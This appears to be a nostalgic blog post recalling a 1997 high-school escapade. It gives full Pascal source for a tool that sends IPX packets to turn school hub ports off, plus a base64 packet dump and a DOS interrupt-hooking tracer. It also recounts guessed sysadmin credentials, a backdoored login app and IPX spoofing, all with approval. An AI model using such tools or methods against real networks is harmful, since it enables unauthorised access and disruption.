Retro: Highschool reversing (’97)

I’ve stumbled upon a lots of interesting stuff this weekend … nothing special, just some emotional retro stuff.

This piece of code got me 2 month ban from the high school’s PC-lab :-). The interesting in it is, that it is 14 years old, and it is written in the first language, I’ve learned: Pascal. (currently I have no idea, what {$i+} or {$i-} are meaning).

Ok, what is this? This tool could turn on/off the ports of the SMC switches/hubs used by our highscool.

How we (me and a friend of mine) created it? It was a long way. At that time we were “Operators” in the PC lab, with a few responsibility and no rights at all. Yeah we wanted some power. We could freeze the server (Novel 3.11), but that was not enough fine grained. We had a backdoor in a fancy “login-screen” app, but it was not ran by everyone. And one day we found a guy from the sysadmin team with an interesting login name. It was so strange, that it was easy to guess, that he used his password for login name, and his user name for password. Using his account we collected a lots of tools, what we started to “reverse engineer”.

At that time, the students had no internet connection just e-mail. That was also useful because we gathered some documentation and other programming stuff using gopher servers and a remote shell server (our first gnu/linux server in another school with full internet connection), which could accept commands by mail, and responded with the results. We had Turbo Pascal and Turbo assembler, and we dreamed about “Watcom C”, and of course gnu/linux too (we had access to one machine running linux, only 1 hour per week). We had a book about the x86 hardware, and another called “Undocumented DOS interrupts”.

Unfortunately we had no debugger. Our idea was to hook the 0x21 interrupt, with a new one (also from Pascal) which prints out the register contents and waits for a keyboard input to continue execution with the old interrupt handler. This was a hard task, because we could hook any of the other interrupts, except 0x21, because the standard method had not worked with 0x21. An extra “recovery” code was needed. That was the hardest part of the task.

But after a long time, we finished with our tracer tool. It was a real eyeopener. We could “trace” all the applications we had access to. We used this tool also to redirect file operations, dump network traffic, etc. It was really fun. After a month of one-two hour evening developments, we had it: A tool to kick off someone from the net. [We never used it in a wrong way …]

Why we got banned? After we had it, we needed to map the PC-s in the lab to the port numbers of the switch. Unfortunately we accidentally switched off the inbound port, on which we were connected. There was no back. We needed direct access to move the incoming cable to another port on the switch, but nobody trusted us. I really don’t know why, because this was way before we got superuser privileges on the server using IPX spoofing :-). So they waited for the sysadmin to fix the problem, who was on holiday. Result: the net was down for 10 days.

Lesson of the story: If we never wanted to fix the situation, nobody finds out that it was caused by us :-).

And here is the tool, aka network programming in Pascal:

program kill;

uses crt,ipxunit,dos;

const
    send_socket = $0A95;
    receive_socket = $0f90;
    e_message : array[1..4] of string = (
        'Kill.ipx not found!',
        'Ipx/Spx driver not found',
        'Socket error',
        'Parameter error !'#13#10
        ' Use : [hub_number] [node_number] [command 01=OFF 02=ON]');

type data=record
    h:ipxheader;
    length:word;
    d:array[1..1024]of byte;
end;

procedure error(en:byte);
begin
    writeln('Error message #',en:3,' : ', e_message[en]);
    halt(en);
end;

var
    e:ECB;
    f:file of data;
    d:data;
    hub_number,node_number,command:byte;
    h1,h2,h3:word;

begin
    writeln;
    writeln('IPX/SPX HUB config 1997 copyright Polemos Soft Company');
    writeln('Version: 1.7 ');
    writeln;

    {PARAMETER}
    val(paramstr(1),hub_number,h1);
    val(paramstr(2),node_number,h2);
    val(paramstr(3),command,h3);
    if (paramcount <> 3)or(h1<>0)or(h2<>0)or(h3<>0) then error(04);

    {FILE}
    assign(f,'kill.ipx');
    {$i-}
    reset(f);
    read(f,d);
    close(f);
    if ioresult<>0 then error(01);
    {$i+}

    {IPX}
    if not IPXinstalled then error(02);
    IpxCloseSocket(send_socket);
    if IPXOpenSocket(send_socket) <> 0 then error(03);

    {ECB}
    ZeroEcb(e);
    with e do begin
        socket_number := send_socket;
        fragment_count := 2;
        fragment[0].address := @(d.h);
        fragment[0].length  := sizeof(IPXHEADER);
        fragment[1].address := @(d.d);
        fragment[1].length  :=d.length;
        immediate_address:=d.h.dest_network_node;
    end;

    {SETTINGS}
    d.h.dest_network_socket:=receive_socket;
    d.d[44]:=hub_number;
    d.d[45]:=node_number;
    case command of
        1:d.d[48]:=01;
        2:d.d[48]:=02;
    end;

    ipxsendpacket(e);
    ipxclosesocket(send_socket);
end.

The dumped out packet (base64 encoded):

//8ATgAEAAq80gCADygNnXd3AAq80gAAwHvgwwqVMAAwLgIBAAQGc21jc2V0oyECAR8CAQACAQAw
FjAUBg8rBgEEAYFKAwEDAQUBAQUCAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

And here is the “tracer” (an early version):

{$M 2048,0,0}
{$F+}

Uses DOS;

Const HEXTABLE : array[1..16] of char = ('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');

Var OldInt21: Pointer;
    Regs : Registers;

Procedure NewInt21; Assembler;
Asm
  cmp   ah,0B0h
  jna    @Write
  jmp   @RunOld

@write:
  push ax
  push bx
  push cx
  push dx
  push es
  push di

  push ax
  mov ax,0b800h
  mov es,ax
  pop ax

  mov di,160
  push ds
  mov dx,ax

  mov ax,seg hextable
  mov ds,ax
  mov bx,offset Hextable

  mov ah,15h

  mov cx,4
@1_NewDos:
  push cx
  mov  cx,4
  xor  al,al
@2_NewDos:
  shl  dx,1
  rcl  al,1
  loop @2_NewDos
  xlat
  mov  es:[di],ax
  add  di,2
  pop cx
  loop @1_NewDos
  mov ax,0h
  int 16h
  pop ds
  pop di
  pop es
  pop dx
  pop cx
  pop bx
  pop ax


  jmp   @RunOld

@I21:
  DD      0

@RunOld:
  push  ds
  push  ax
  mov   ax, SEG @Data
  mov   ds, ax
  mov   ax, WORD PTR OldInt21
  mov   WORD PTR cs:[offset @I21], ax
  mov   ax, WORD PTR OldInt21 +2
  mov   WORD PTR cs:[offset @I21 +2], ax
  pop   ax
  pop   ds
  jmp   DWORD PTR cs:[offset @I21]
End;

Begin
Writeln('Netware Debuger for Dos v1.0!');
Writeln('CopyRight (c) Polemos TM (Polemos Soft Company ''97)');
Writeln('All rights reserved.');

GetIntVec($21,oldint21);
SetIntVec($21,@newint21);
Keep(0);
End
Advertisements
This entry was posted in Retro and tagged , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s